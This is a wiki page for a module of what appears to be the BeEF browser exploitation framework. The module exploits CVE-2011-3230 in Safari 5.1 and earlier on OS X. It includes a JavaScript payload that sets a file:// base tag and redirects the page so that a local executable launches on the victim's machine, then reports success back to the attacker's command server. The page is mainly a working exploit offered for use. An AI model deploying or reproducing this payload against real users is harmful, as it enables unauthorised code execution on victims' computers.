Skip to content

Module: Safari Launch App

Jess Williams edited this page Jan 13, 2020 · 3 revisions

Summary

  • Objective: rewrite a selected real URL link to a fake url

  • Authors: antisnatchor

  • Browsers: Safari <= 5.1 on OSX

  • Code

Internal Working

Uses the file:// scheme to launch an executable.

baseTag.setAttribute('href', 'file://');
document.head.appendChild(baseTag);
setTimeout('document.location="<%= @app_path %>";beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command [<%= @app_path %>] launched");', 1000);

References

See CVE-2011-3230 for more details.

Feedback

Clone this wiki locally